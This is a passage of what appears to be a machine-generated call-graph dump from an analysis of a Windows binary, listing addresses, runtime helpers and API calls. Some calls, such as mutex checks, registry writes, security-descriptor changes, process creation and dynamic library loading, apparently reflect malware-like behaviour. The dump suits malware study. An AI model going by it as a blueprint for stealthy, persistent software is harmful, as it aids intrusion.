7e46ad _free 66 API calls 18244->18245 18246 7ecde7 18245->18246 18247 7e46ad _free 66 API calls 18246->18247 18248 7ecdef 18247->18248 18249 7e46ad _free 66 API calls 18248->18249 18250 7ecdf7 18249->18250 18251 7e46ad _free 66 API calls 18250->18251 18252 7ecdff 18251->18252 18253 7e46ad _free 66 API calls 18252->18253 18254 7ece07 18253->18254 18255 7e46ad _free 66 API calls 18254->18255 18256 7ece0e 18255->18256 18257 7e46ad _free 66 API calls 18256->18257 18258 7ece16 18257->18258 18259 7e46ad _free 66 API calls 18258->18259 18260 7ece1e 18259->18260 18261 7e46ad _free 66 API calls 18260->18261 18262 7ece26 18261->18262 18263 7e46ad _free 66 API calls 18262->18263 18264 7ece2e 18263->18264 18265 7e46ad _free 66 API calls 18264->18265 18266 7ece36 18265->18266 18267 7e46ad _free 66 API calls 18266->18267 18268 7ece3e 18267->18268 18269 7e46ad _free 66 API calls 18268->18269 18270 7ece46 18269->18270 18271 7e46ad _free 66 API calls 18270->18271 18272 7ece4e 18271->18272 18273 7e46ad _free 66 API calls 18272->18273 18274 7ece56 18273->18274 18275 7e46ad _free 66 API calls 18274->18275 18276 7ece61 18275->18276 18277 7e46ad _free 66 API calls 18276->18277 18278 7ece69 18277->18278 18279 7e46ad _free 66 API calls 18278->18279 18280 7ece71 18279->18280 18281 7e46ad _free 66 API calls 18280->18281 18282 7ece79 18281->18282 18283 7e46ad _free 66 API calls 18282->18283 18284 7ece81 18283->18284 18285 7e46ad _free 66 API calls 18284->18285 18286 7ece89 18285->18286 18287 7e46ad _free 66 API calls 18286->18287 18288 7ece91 18287->18288 18289 7e46ad _free 66 API calls 18288->18289 18290 7ece99 18289->18290 18291 7e46ad _free 66 API calls 18290->18291 18292 7ecea1 18291->18292 18293 7e46ad _free 66 API calls 18292->18293 18294 7ecea9 18293->18294 18295 7e46ad _free 66 API calls 18294->18295 18296 7eceb1 18295->18296 18297 7e46ad _free 66 API calls 18296->18297 18414->18155 18418 7ec64c LeaveCriticalSection 18415->18418 18417 7e8bfc 18417->18137 18418->18417 18420 7e8e6f __mtinitlocknum 18419->18420 18421 7e81be __getptd 66 API calls 18420->18421 18422 7e8e78 18421->18422 18423 7e8b5a __setmbcp 68 API calls 18422->18423 18424 7e8e82 18423->18424 18450 7e8bfe 18424->18450 18427 7ec14e __malloc_crt 66 API calls 18428 7e8ea3 18427->18428 18429 7e8fc2 __mtinitlocknum 18428->18429 18457 7e8c7a 18428->18457 18429->18092 18432 7e8fcf 18432->18429 18436 7e8fe2 18432->18436 18438 7e46ad _free 66 API calls 18432->18438 18433 7e8ed3 InterlockedDecrement 18434 7e8ef4 InterlockedIncrement 18433->18434 18435 7e8ee3 18433->18435 18434->18429 18437 7e8f0a 18434->18437 18435->18434 18440 7e46ad _free 66 API calls 18435->18440 18439 7e72de __mtinitlocknum 66 API calls 18436->18439 18437->18429 18441 7ec725 __lock 66 API calls 18437->18441 18438->18436 18439->18429 18442 7e8ef3 18440->18442 18444 7e8f1e InterlockedDecrement 18441->18444 18442->18434 18445 7e8fad InterlockedIncrement 18444->18445 18446 7e8f9a 18444->18446 18467 7e8fc4 18445->18467 18446->18445 18448 7e46ad _free 66 API calls 18446->18448 18449 7e8fac 18448->18449 18449->18445 18451 7e4404 _LocaleUpdate::_LocaleUpdate 76 API calls 18450->18451 18452 7e8c12 18451->18452 18453 7e8c1d GetOEMCP 18452->18453 18454 7e8c3b 18452->18454 18455 7e8c2d 18453->18455 18454->18455 18456 7e8c40 GetACP 18454->18456 18455->18427 18455->18429 18456->18455 18458 7e8bfe getSystemCP 78 API calls 18457->18458 18459 7e8c9a 18458->18459 18460 7e8ca5 setSBCS 18459->18460 18463 7e8ce9 IsValidCodePage 18459->18463 18465 7e8d0e _memset __setmbcp_nolock 18459->18465 18461 7e7fff __atodbl_l 5 API calls 18460->18461 18462 7e8e61 18461->18462 18462->18432 18462->18433 18463->18460 18464 7e8cfb GetCPInfo 18463->18464 18464->18460 18464->18465 18470 7e89ca GetCPInfo 18465->18470 18531 7ec64c LeaveCriticalSection 18467->18531 18469 7e8fcb 18469->18429 18471 7e8ab2 18470->18471 18472 7e89fe _memset 18470->18472 18476 7e7fff __atodbl_l 5 API calls 18471->18476 18480 7ecd86 18472->18480 18478 7e8b58 18476->18478 18478->18465 18479 7ecc59 ___crtLCMapStringA 82 API calls 18479->18471 18481 7e4404 _LocaleUpdate::_LocaleUpdate 76 API calls 18480->18481 18482 7ecd99 18481->18482 18490 7ecc9f 18482->18490 18485 7ecc59 18486 7e4404 _LocaleUpdate::_LocaleUpdate 76 API calls 18485->18486 18487 7ecc6c 18486->18487 18507 7eca72 18487->18507 18491 7eccbd 18490->18491 18492 7eccc8 MultiByteToWideChar 18490->18492 18491->18492 18496 7eccf5 18492->18496 18502 7eccf1 18492->18502 18493 7e7fff __atodbl_l 5 API calls 18494 7e8a6d 18493->18494 18494->18485 18495 7ecd0a _memset __crtLCMapStringA_stat 18498 7ecd43 MultiByteToWideChar 18495->18498 18495->18502 18496->18495 18497 7e4619 _malloc 66 API calls 18496->18497 18497->18495 18499 7ecd6a 18498->18499 18500 7ecd59 GetStringTypeW 18498->18500 18503 7eca52 18499->18503 18500->18499 18502->18493 18504 7eca5e 18503->18504 18505 7eca6f 18503->18505 18504->18505 18506 7e46ad _free 66 API calls 18504->18506 18505->18502 18506->18505 18508 7eca90 MultiByteToWideChar 18507->18508 18510 7ecaee 18508->18510 18512 7ecaf5 18508->18512 18511 7e7fff __atodbl_l 5 API calls 18510->18511 18514 7e8a8d 18511->18514 18515 7e4619 _malloc 66 API calls 18512->18515 18520 7ecb0e __crtLCMapStringA_stat 18512->18520 18513 7ecb42 MultiByteToWideChar 18516 7ecc3a 18513->18516 18517 7ecb5b LCMapStringW 18513->18517 18514->18479 18515->18520 18518 7eca52 __freea 66 API calls 18516->18518 18517->18516 18519 7ecb7a 18517->18519 18518->18510 18521 7ecb84 18519->18521 18524 7ecbad 18519->18524 18520->18510 18520->18513 18521->18516 18522 7ecb98 LCMapStringW 18521->18522 18522->18516 18523 7ecbfc LCMapStringW 18525 7ecc34 18523->18525 18526 7ecc12 WideCharToMultiByte 18523->18526 18527 7ecbc8 __crtLCMapStringA_stat 18524->18527 18528 7e4619 _malloc 66 API calls 18524->18528 18529 7eca52 __freea 66 API calls 18525->18529 18526->18525 18527->18516 18527->18523 18528->18527 18529->18516 18531->18469 18533 7e88ed 18532->18533 18534 7e88e6 18532->18534 18535 7e72de __mtinitlocknum 66 API calls 18533->18535 18534->18533 18537 7e890b 18534->18537 18540 7e88f2 18535->18540 18536 7e728c __snwprintf 11 API calls 18538 7e88fc 18536->18538 18537->18538 18539 7e72de __mtinitlocknum 66 API calls 18537->18539 18538->17590 18539->18540 18540->18536 18542 7ec131 EncodePointer 18541->18542 18542->18542 18543 7ec14b 18542->18543 18543->17603 18547 7e8756 18544->18547 18546 7e879f 18546->17605 18548 7e8762 __mtinitlocknum 18547->18548 18555 7e9438 18548->18555 18554 7e8783 __mtinitlocknum 18554->18546 18556 7ec725 __lock 66 API calls 18555->18556 18557 7e8767 18556->18557 18558 7e866f DecodePointer DecodePointer 18557->18558 18559 7e871e 18558->18559 18560 7e869d 18558->18560 18569 7e878c 18559->18569 18560->18559 18572 7ec8c7 18560->18572 18562 7e8701 EncodePointer EncodePointer 18562->18559 18563 7e86af 18563->18562 18564 7e86d3 18563->18564 18579 7ec1df 18563->18579 18564->18559 18566 7ec1df __realloc_crt 70 API calls 18564->18566 18567 7e86ef EncodePointer 18564->18567 18568 7e86e9 18566->18568 18567->18562 18568->18559 18568->18567 18605 7e9441 18569->18605 18573 7ec8e7 HeapSize 18572->18573 18574 7ec8d2 18572->18574 18573->18563 18575 7e72de __mtinitlocknum 66 API calls 18574->18575 18576 7ec8d7 18575->18576 18577 7e728c __snwprintf 11 API calls 18576->18577 18578 7ec8e2 18577->18578 18578->18563 18581 7ec1e8 18579->18581 18582 7ec227 18581->18582 18583 7ec208 Sleep 18581->18583 18584 7ee464 18581->18584 18582->18564 18583->18581 18585 7ee46f 18584->18585 18586 7ee47a 18584->18586 18587 7e4619 _malloc 66 API calls 18585->18587 18588 7ee482 18586->18588 18596 7ee48f 18586->18596 18590 7ee477 18587->18590 18589 7e46ad _free 66 API calls 18588->18589 18604 7ee48a __dosmaperr 18589->18604 18590->18581 18591 7ee4c7 18593 7e87b8 _malloc DecodePointer 18591->18593 18592 7ee497 HeapReAlloc 18592->18596 18592->18604 18594 7ee4cd 18593->18594 18597 7e72de __mtinitlocknum 66 API calls 18594->18597 18595 7ee4f7 18599 7e72de __mtinitlocknum 66 API calls 18595->18599 18596->18591 18596->18592 18596->18595 18598 7e87b8 _malloc DecodePointer 18596->18598 18601 7ee4df 18596->18601 18597->18604 18598->18596 18600 7ee4fc GetLastError 18599->18600 18600->18604 18602 7e72de __mtinitlocknum 66 API calls 18601->18602 18603 7ee4e4 GetLastError 18602->18603 18603->18604 18604->18581 18608 7ec64c LeaveCriticalSection 18605->18608 18607 7e8791 18607->18554 18608->18607 18613 7d8134 18609->18613 18625 7c1036 18609->18625 18610 7d81f6 LoadLibraryW 18611 7d8211 18610->18611 18610->18625 18614 7d82eb LoadLibraryW 18611->18614 18619 7d8239 18611->18619 18612 7d81b1 GetProcAddress 18612->18613 18620 7d81a8 18612->18620 18613->18610 18617 7d8150 18613->18617 18618 7d8306 18614->18618 18614->18625 18615 7d8173 GetProcAddress 18615->18617 18615->18620 18616 7d82a0 GetProcAddress 18616->18611 18616->18620 18617->18612 18617->18613 18617->18615 18621 7d832e 18618->18621 18622 7d83e0 LoadLibraryW 18618->18622 18619->18611 18619->18616 18623 7d825f GetProcAddress 18619->18623 18620->18625 18621->18618 18624 7d8395 GetProcAddress 18621->18624 18627 7d8354 GetProcAddress 18621->18627 18622->18625 18629 7d83fb 18622->18629 18623->18619 18623->18620 18624->18618 18624->18620 18625->17616 18625->17617 18626 7d84d5 LoadLibraryW 18626->18625 18636 7d84f0 18626->18636 18627->18620 18627->18621 18628 7d848a GetProcAddress 18628->18620 18628->18629 18629->18626 18633 7d8423 18629->18633 18630 7d8449 GetProcAddress 18630->18620 18630->18633 18631 7d85ca LoadLibraryW 18631->18625 18638 7d85e5 18631->18638 18632 7d857f GetProcAddress 18632->18620 18632->18636 18633->18628 18633->18629 18633->18630 18634 7d853e GetProcAddress 18634->18625 18634->18636 18635 7d86bf LoadLibraryW 18635->18625 18643 7d86da 18635->18643 18636->18631 18636->18632 18636->18634 18637 7d8674 GetProcAddress 18637->18620 18637->18638 18638->18635 18641 7d860d 18638->18641 18639 7d8633 GetProcAddress 18639->18620 18639->18641 18640 7d87b4 LoadLibraryW 18640->18625 18648 7d87cf 18640->18648 18641->18637 18641->18638 18641->18639 18642 7d8769 GetProcAddress 18642->18620 18642->18643 18643->18640 18647 7d8702 18643->18647 18644 7d88a9 LoadLibraryW 18644->18625 18653 7d88c4 18644->18653 18645 7d8728 GetProcAddress 18645->18620 18645->18647 18646 7d885e GetProcAddress 18646->18620 18646->18648 18647->18642 18647->18643 18647->18645 18648->18644 18652 7d87f7 18648->18652 18649 7d899e LoadLibraryW 18649->18625 18658 7d89b9 18649->18658 18650 7d881d GetProcAddress 18650->18620 18650->18652 18651 7d8953 GetProcAddress 18651->18620 18651->18653 18652->18646 18652->18648 18652->18650 18653->18649 18657 7d88ec 18653->18657 18654 7d8a93 LoadLibraryW 18654->18625 18663 7d8aae 18654->18663 18655 7d8912 GetProcAddress 18655->18620 18655->18657 18656 7d8a48 GetProcAddress 18656->18620 18656->18658 18657->18651 18657->18653 18657->18655 18658->18654 18662 7d89e1 18658->18662 18659 7d8b88 LoadLibraryW 18659->18625 18668 7d8ba3 18659->18668 18660 7d8a07 GetProcAddress 18660->18620 18660->18662 18661 7d8b3d GetProcAddress 18661->18620 18661->18663 18662->18656 18662->18658 18662->18660 18663->18659 18667 7d8ad6 18663->18667 18664 7d8c7d LoadLibraryW 18664->18625 18673 7d8c98 18664->18673 18665 7d8afc GetProcAddress 18665->18620 18665->18667 18666 7d8c32 GetProcAddress 18666->18620 18666->18668 18667->18661 18667->18663 18667->18665 18668->18664 18672 7d8bcb 18668->18672 18669 7d8bf1 GetProcAddress 18669->18620 18669->18672 18670 7d8d72 LoadLibraryW 18670->18625 18678 7d8d8d 18670->18678 18671 7d8d27 GetProcAddress 18671->18620 18671->18673 18672->18666 18672->18668 18672->18669 18673->18670 18676 7d8cc0 18673->18676 18674 7d8ce6 GetProcAddress 18674->18620 18674->18676 18675 7d8e67 LoadLibraryW 18675->18625 18686 7d8e82 18675->18686 18676->18671 18676->18673 18676->18674 18677 7d8e1c GetProcAddress 18677->18620 18677->18678 18678->18675 18681 7d8db5 18678->18681 18679 7d8ddb GetProcAddress 18679->18620 18679->18681 18680 7d8f5c LoadLibraryW 18680->18625 18689 7d8f77 18680->18689 18681->18677 18681->18678 18681->18679 18682 7d8f11 GetProcAddress 18682->18620 18682->18686 18683 7d9051 LoadLibraryW 18683->18625 18690 7d906c 18683->18690 18684 7d8ed0 GetProcAddress 18684->18625 18684->18686 18685 7d9006 GetProcAddress 18685->18620 18685->18689 18686->18680 18686->18682 18686->18684 18687 7d8fc5 GetProcAddress 18687->18625 18687->18689 18688 7d90f8 GetProcAddress 18688->18620 18688->18690 18689->18683 18689->18685 18689->18687 18690->18625 18692 7d9094 18690->18692 18691 7d90ba GetProcAddress 18691->18620 18691->18692 18692->18688 18692->18690 18692->18691 18694 7c9caa GetProcAddress 18693->18694 18695 7c1089 18693->18695 18696 7c9cc8 FreeLibrary 18694->18696 18697 7c9cc2 18694->18697 18698 7dc1e0 GetModuleHandleW GetProcAddress 18695->18698 18696->18695 18697->18696 18699 7dc21c GetCurrentProcess 18698->18699 18700 7c108e Wow64DisableWow64FsRedirection GetCurrentProcess CreateMutexW 18698->18700 18699->18700 18700->17626 18700->17627 18702 7d268d RegOpenKeyW 18701->18702 18703 7d26be 18701->18703 18702->18703 18704 7d26a5 RegDeleteValueW RegCloseKey 18702->18704 18705 7d26f8 18703->18705 18706 7d26c7 RegOpenKeyW 18703->18706 18704->18703 18705->17628 18706->18705 18707 7d26df RegDeleteValueW RegCloseKey 18706->18707 18707->18705 19130 7e3520 18708->19130 18711 7cb8a4 _memset 18713 7cb8c0 GetWindowsDirectoryW 18711->18713 18712 7c110e 18712->17632 18712->17633 18713->18712 18714 7cb8dd _memset 18713->18714 18715 7cb8f9 GetSystemDirectoryW 18714->18715 18715->18712 18716 7cb916 _memset 18715->18716 18717 7e359a __snwprintf 102 API calls 18716->18717 18718 7cb952 _memset 18717->18718 18719 7e359a __snwprintf 102 API calls 18718->18719 18720 7cb991 _memset 18719->18720 18721 7e359a __snwprintf 102 API calls 18720->18721 18722 7cb9d0 StrCmpIW 18721->18722 18722->18712 18723 7cb9eb StrCmpIW 18722->18723 18723->18712 18724 7cba03 StrCmpIW 18723->18724 18724->18712 18726 7dbb68 18725->18726 18727 7dbb72 GetModuleFileNameW 18725->18727 19254 7c21e0 18726->19254 18727->18726 18728 7dbb91 18727->18728 18732 7dbbab 18728->18732 18733 7dbbb0 OpenMutexW 18728->18733 18735 7c1191 RtlExitUserThread 18732->18735 18733->18726 18736 7dbbe5 18733->18736 18734 7dbe60 19268 7c5060 18734->19268 18735->17632 19132 7c2160 18736->19132 18746 7dbe7b 19277 7d6be0 18746->19277 18747 7dbe73 ExitProcess 18752 7dbe89 CloseHandle 18753 7dbe95 18752->18753 18754 7dbe9b CloseHandle 18753->18754 18755 7dbea5 18753->18755 18754->18755 18757 7dbecc 18755->18757 18758 7dbebf CloseHandle 18755->18758 18759 7dbedc 18757->18759 18760 7dbed2 LocalFree 18757->18760 18758->18757 18759->18735 18762 7dbee5 ExitProcess 18759->18762 18760->18759 18770 7dbc9f 18772 7dc4b0 4 API calls 18770->18772 18771 7dbc82 CreateMutexW 18771->18732 18771->18770 18773 7dbcb0 18772->18773 19208 7cbc80 LocalAlloc 18773->19208 18776 7dbce1 18778 7dc4b0 4 API calls 18776->18778 18777 7dbcc4 CreateMutexW 18777->18732 18777->18776 18779 7dbcf2 18778->18779 19221 7cbd80 LocalAlloc 18779->19221 18800 7d00e5 lstrcmpiW 18799->18800 18801 7c119e 18799->18801 18802 7d00ff IsUserAnAdmin 18800->18802 18803 7d01c6 lstrcmpiW 18800->18803 18801->17641 18801->17642 18806 7d016c ExitProcess 18802->18806 18807 7d0114 OpenEventW 18802->18807 18804 7d02a5 lstrcmpiW 18803->18804 18805 7d01e0 OpenMutexW 18803->18805 18812 7d02bf OpenMutexW 18804->18812 18813 7d037e lstrcmpiW 18804->18813 18808 7d01fb WaitForSingleObject CloseHandle 18805->18808 18809 7d0214 OpenMutexW 18805->18809 18810 7d0136 SetEvent 18807->18810 18811 7d0162 ExitProcess 18807->18811 18808->18809 18814 7d022f WaitForSingleObject CloseHandle 18809->18814 18815 7d0248 18809->18815 18817 7d0144 CloseHandle ExitProcess 18810->18817 18818 7d0156 CloseHandle 18810->18818 18819 7d02da WaitForSingleObject CloseHandle 18812->18819 18820 7d02f3 OpenMutexW 18812->18820 18813->18801 18816 7d0394 18813->18816 18814->18815 18821 7d028b Sleep 18815->18821 18822 7d0251 OpenMutexW 18815->18822 18823 7d039d OpenMutexW 18816->18823 18824 7d03d7 Sleep 18816->18824 18825 7d016a 18818->18825 18819->18820 18826 7d030e WaitForSingleObject CloseHandle 18820->18826 18827 7d0327 18820->18827 18821->18801 18828 7d0287 18822->18828 18829 7d0273 CloseHandle Sleep 18822->18829 18830 7d03bf CloseHandle Sleep 18823->18830 18831 7d03d3 18823->18831 18824->18801 18836 7d017d OpenMutexW 18825->18836 18837 7d01b3 18825->18837 18826->18827 18832 7d036a Sleep 18827->18832 18833 7d0330 OpenMutexW 18827->18833 18828->18821 18829->18815 18830->18816 18831->18824 18832->18801 18834 7d0366 18833->18834 18835 7d0352 CloseHandle Sleep 18833->18835 18834->18832 18835->18827 18836->18837 18838 7d019f CloseHandle Sleep 18836->18838 18837->18801 18838->18825 18840 7c1285 18839->18840 18841 7dc0c9 RtlGetVersion 18839->18841 18840->17649 18842 7dc3a0 AllocateAndInitializeSid 18840->18842 18841->18840 18843 7c128f 18842->18843 18844 7dc3ea CheckTokenMembership 18842->18844 18843->17649 18847 7d6410 LocalAlloc 18843->18847 18845 7dc3fe 18844->18845 18846 7dc405 FreeSid 18844->18846 18845->18846 18846->18843 18848 7d6452 18847->18848 18852 7d6850 18847->18852 18849 7d684a 18848->18849 18850 7d6486 _wcscat 18848->18850 18851 7d6858 LocalFree 18849->18851 18849->18852 18853 7d64bf 18850->18853 18854 7d650e 18850->18854 18851->18852 18852->17676 18855 7e359a __snwprintf 102 API calls 18853->18855 18856 7d65cc 18854->18856 18857 7d6527 LocalAlloc 18854->18857 18880 7d64e9 _wcscat 18855->18880 18858 7d665e 18856->18858 18859 7d65e1 SHGetKnownFolderPath 18856->18859 18860 7d65c7 18857->18860 18861 7d6547 GetWindowsDirectoryW 18857->18861 18863 7d66f0 18858->18863 18864 7d6673 SHGetKnownFolderPath 18858->18864 18862 7d65fb 18859->18862 18859->18880 18860->18880 18865 7d655d 18861->18865 18866 7d65ba LocalFree 18861->18866 18869 7e359a __snwprintf 102 API calls 18862->18869 18867 7d6709 LocalAlloc 18863->18867 18868 7d67b8 18863->18868 18870 7d668d 18864->18870 18864->18880 18871 7e359a __snwprintf 102 API calls 18865->18871 18866->18860 18867->18860 18872 7d6729 GetTempPathW 18867->18872 18876 7d67cd SHGetKnownFolderPath 18868->18876 18868->18880 18873 7d662c CoTaskMemFree 18869->18873 18874 7e359a __snwprintf 102 API calls 18870->18874 18875 7d659a _wcscat 18871->18875 18878 7d673f 18872->18878 18879 7d67a6 LocalFree 18872->18879 18873->18880 18881 7d66be CoTaskMemFree 18874->18881 18875->18866 18877 7d67e7 18876->18877 18876->18880 18882 7e359a __snwprintf 102 API calls 18877->18882 18884 7e359a __snwprintf 102 API calls 18878->18884 18879->18860 18880->17676 18881->18880 18883 7d6818 CoTaskMemFree 18882->18883 18883->18880 18885 7d6786 _wcscat 18884->18885 18885->18879 18887 7c12c3 LocalFree 18886->18887 18888 7d6893 GetSystemDirectoryW 18886->18888 18887->17649 18889 7d68aa LocalAlloc 18888->18889 18890 7d6987 LocalFree 18888->18890 18889->18890 18891 7d68c4 18889->18891 18890->18887 18892 7d79f0 5 API calls 18891->18892 18893 7d68e6 18892->18893 18894 7e359a __snwprintf 102 API calls 18893->18894 18895 7d6902 _memset 18894->18895 18896 7d6915 CreateProcessW 18895->18896 18897 7d697d LocalFree 18896->18897 18898 7d6962 LocalFree LocalFree 18896->18898 18897->18890 18898->18887 18900 7c133e CreateEventW 18899->18900 18901 7dc4f0 GetSecurityDescriptorSacl 18899->18901 18900->17666 18900->17667 18902 7dc50a SetNamedSecurityInfoW 18901->18902 18903 7dc525 LocalFree 18901->18903 18902->18903 18903->18900 18905 7c1563 18904->18905 18906 7cfa51 GetModuleFileNameW 18904->18906 18905->17695 18905->17696 18907 7cfa6f LoadLibraryW 18906->18907 18909 7cfa6b 18906->18909 18908 7cfa8d GetModuleFileNameW 18907->18908 18907->18909 18908->18909 18909->18905 18911 7d760c CreateMutexW 18910->18911 18912 7c1574 18910->18912 18911->18912 18913 7d7629 18911->18913 18912->17702 18912->17703 18913->18912 18915 7e359a __snwprintf 102 API calls 18914->18915 18916 7d4204 RegCreateKeyExW 18915->18916 18917 7d4234 RegCloseKey 18916->18917 18923 7c1585 18916->18923 18918 7d424b _memset 18917->18918 21015 7cb4a0 18918->21015 18921 7d425e GetSystemTime SystemTimeToFileTime 21019 7cb510 18921->21019 18923->17709 18923->17710 18925 7e3520 _memset 18924->18925 18926 7d42d9 GetModuleFileNameW 18925->18926 18927 7d42f8 18926->18927 18928 7c1596 18926->18928 21026 7dc570 CreateFileW 18927->21026 18928->17717 18928->17718 18931 7e359a __snwprintf 102 API calls 18932 7d433c RegOpenKeyExW 18931->18932 18933 7d43b9 LocalFree 18932->18933 18934 7d4363 RegSetValueExW 18932->18934 18933->18928 18935 7d43ac RegCloseKey 18934->18935 18936 7d438b RegCloseKey LocalFree 18934->18936 18935->18933 18936->18928 18938 7e3520 _memset 18937->18938 18939 7d43f5 GetModuleFileNameW 18938->18939 18940 7c15a7 18939->18940 18941 7d4414 18939->18941 18940->17726 18940->17727 18942 7e359a __snwprintf 102 API calls 18941->18942 18943 7d442f RegOpenKeyExW 18942->18943 18943->18940 18944 7d4456 lstrlenW RegSetValueExW 18943->18944 18945 7d449d RegCloseKey 18944->18945 18946 7d4489 RegCloseKey 18944->18946 18945->18940 18946->18940 18948 7c15df 18947->18948 18949 7cff31 LocalAlloc 18947->18949 18948->17738 18948->17739 18950 7cff4b wnsprintfW 18949->18950 18951 7cfff5 CoTaskMemFree 18949->18951 18952 7cffeb LocalFree 18950->18952 18953 7cff74 18950->18953 18951->18948 18952->18951 19023 7c1240 19022->19023 19024 7c1cb5 _memset 19022->19024 19023->17691 19023->17692 19025 7c1cd1 GetWindowsDirectoryW 19024->19025 19026 7c1cee _memset 19025->19026 19027 7c1fdf 19025->19027 19029 7dc1e0 3 API calls 19026->19029 19027->19023 19028 7c1fe5 CloseHandle 19027->19028 19028->19023 19030 7c1d12 19029->19030 19031 7c1d39 19030->19031 19032 7c1d17 19030->19032 19034 7e359a __snwprintf 102 API calls 19031->19034 19033 7e359a __snwprintf 102 API calls 19032->19033 19035 7c1d34 _memset 19033->19035 19034->19035 19036 7c1d75 GetCurrentDirectoryW 19035->19036 19036->19027 19037 7c1d92 LocalAlloc 19036->19037 19037->19027 19038 7c1dbc 14 API calls 19037->19038 19039 7ca1b0 26 API calls 19038->19039 19040 7c1f67 19039->19040 19041 7c1f6f WaitForSingleObject 19040->19041 19042 7c1fc9 19040->19042 19043 7c1f90 TerminateProcess CloseHandle CloseHandle 19041->19043 19042->19027 19044 7c1fd2 LocalFree 19042->19044 19043->19042 19044->19027 21073 7cfcf0 19046->21073 19049 7cfe82 lstrlenW lstrlenW LocalAlloc 19050 7cff00 CoTaskMemFree 19049->19050 19051 7cfec1 19049->19051 19052 7c13c5 19050->19052 19053 7e359a __snwprintf 102 API calls 19051->19053 19052->17699 19052->17700 19054 7cfedf lstrlenW CoTaskMemFree 19053->19054 19054->19052 19056 7cfe20 109 API calls 19055->19056 19057 7cfaed 19056->19057 19131 7cb885 GetModuleFileNameW 19130->19131 19131->18711 19131->18712 19133 7c216c 19132->19133 19134 7c2173 CreateEventW 19132->19134 19133->18726 19137 7c41f0 19133->19137 19134->19133 19135 7c218f CreateThread 19134->19135 19135->19133 19136 7c21b9 CloseHandle 19135->19136 19308 7c25a0 19135->19308 19136->19133 19138 7c41fc 19137->19138 19139 7c420f CreateEventW 19137->19139 19138->19139 19140 7c4205 19138->19140 19139->19140 19141 7c422b CreateEventW 19139->19141 19140->18726 19145 7d7640 19140->19145 19142 7c4287 CloseHandle 19141->19142 19143 7c4247 CreateThread 19141->19143 19142->19140 19143->19140 19144 7c4271 CloseHandle 19143->19144 19422 7c4320 19143->19422 19144->19142 19146 7d764c 19145->19146 19147 7d7653 CreateThread 19145->19147 19146->18726 19148 7c6850 GetModuleHandleW GetProcAddress GetProcAddress 19146->19148 19147->19146 19709 7d76f0 GetModuleHandleW 19147->19709 19149 7c6890 19148->19149 19149->18726 19150 7d69a0 lstrlenW 19149->19150 19151 7d69b8 CreateEventW 19150->19151 19156 7d69f7 19150->19156 19153 7d69d4 CreateThread 19151->19153 19151->19156 19152 7d6adf 19159 7d6aed 19152->19159 19799 7d2560 19152->19799 19155 7d69fb LocalFree 19153->19155 19153->19156 20255 7cba30 19153->20255 19154 7dc3a0 3 API calls 19160 7d6a23 19154->19160 19155->19156 19156->19152 19156->19154 19158 7d6afb 19162 7d6b09 19158->19162 19847 7dac50 CreateThread 19158->19847 19159->19158 19812 7d22d0 LocalAlloc 19159->19812 19160->19152 19163 7cfe20 109 API calls 19160->19163 19849 7c8cd0 19162->19849 19174 7d6a51 _memset 19163->19174 19167 7d6b1c CreateEventW 19168 7d6b6a WSAStartup 19167->19168 19169 7d6b38 CreateThread 19167->19169 19170 7d6b7d 19168->19170 19171 7d6bc3 19168->19171 19175 7d6b5d CloseHandle 19169->19175 19176 7d6b5b 19169->19176 20271 7cf100 19169->20271 19172 7d6b86 CreateThread 19170->19172 19173 7d6ba0 CreateThread 19170->19173 19171->18726 19182 7c5010 19171->19182 19172->19173 20331 7db630 CreateEventW 19172->20331 19173->19171 19177 7d6bca WSACleanup 19173->19177 20357 7e1030 OpenEventW 19173->20357 19174->19152 19178 7e359a __snwprintf 102 API calls 19174->19178 19175->19168 19176->19168 19177->19171 19179 7d6aa4 19178->19179 19720 7ca680 19179->19720 19183 7c501c 19182->19183 19184 7c5023 CreateThread 19182->19184 19183->18726 19185 7c45b0 19183->19185 19184->19183 20775 7c5140 LocalAlloc 19184->20775 19186 7c45c3 19185->19186 19194 7c45bc 19185->19194 20946 7c4700 19186->20946 19189 7c460d CreateThread 19189->19194 20958 7c4800 19189->20958 19192 7c4700 103 API calls 19193 7c4602 19192->19193 19193->19189 19193->19194 19194->18726 19195 7cbb80 LocalAlloc 19194->19195 19196 7cbc6b 19195->19196 19197 7cbba0 LocalAlloc 19195->19197 19196->18770 19196->18771 19198 7cbbba LocalAlloc 19197->19198 19199 7cbc61 LocalFree 19197->19199 19200 7cbbd4 GetModuleFileNameW 19198->19200 19201 7cbc57 LocalFree 19198->19201 19199->19196 19202 7cbc4d LocalFree 19200->19202 19203 7cbbe9 GetWindowsDirectoryW 19200->19203 19201->19199 19202->19201 19203->19202 19204 7cbbfc 19203->19204 19205 7e359a __snwprintf 102 API calls 19204->19205 19206 7cbc13 lstrcmpiW 19205->19206 19206->19202 19207 7cbc28 LocalFree LocalFree LocalFree 19206->19207 19207->19196 19209 7cbd6b 19208->19209 19210 7cbca0 LocalAlloc 19208->19210 19209->18776 19209->18777 19211 7cbcba LocalAlloc 19210->19211 19212 7cbd61 LocalFree 19210->19212 19213 7cbcd4 GetModuleFileNameW 19211->19213 19214 7cbd57 LocalFree 19211->19214 19212->19209 19215 7cbd4d LocalFree 19213->19215 19216 7cbce9 GetSystemDirectoryW 19213->19216 19214->19212 19215->19214 19216->19215 19217 7cbcfc 19216->19217 19218 7e359a __snwprintf 102 API calls 19217->19218 19222 7cbe6b 19221->19222 19223 7cbda0 LocalAlloc 19221->19223 19255 7c21ec SetEvent 19254->19255 19256 7c21f8 19254->19256 19255->19256 19257 7c2227 19256->19257 19258 7c2201 WaitForSingleObject CloseHandle 19256->19258 19259 7c2246 19257->19259 19260 7c2230 CloseHandle 19257->19260 19258->19257 19261 7c42b0 19259->19261 19260->19259 19262 7c42bc SetEvent 19261->19262 19263 7c42c8 19261->19263 19262->19263 19264 7c42f7 19263->19264 19265 7c42d1 WaitForSingleObject CloseHandle 19263->19265 19266 7c4316 19264->19266 19267 7c4300 CloseHandle 19264->19267 19265->19264 19266->18734 19267->19266 19269 7c506c WaitForSingleObject 19268->19269 19270 7c507a 19268->19270 19269->19270 19271 7d7690 19270->19271 19272 7d769c 19271->19272 19273 7d76a3 19271->19273 19272->18746 19272->18747 19274 7d76ac PostMessageW 19273->19274 19275 7d76be 19273->19275 19274->19275 19275->19272 19276 7d76c7 WaitForSingleObject CloseHandle 19275->19276 19276->19272 19278 7d6bf6 SetEvent 19277->19278 19279 7d6c02 19277->19279 19278->19279 19280 7d6c0b WaitForSingleObject 19279->19280 19281 7d6c1a 19279->19281 19280->19281 19282 7d6c30 19281->19282 19283 7d6c23 CloseHandle 19281->19283 19284 7d6c39 SetEvent 19282->19284 19285 7d6c45 19282->19285 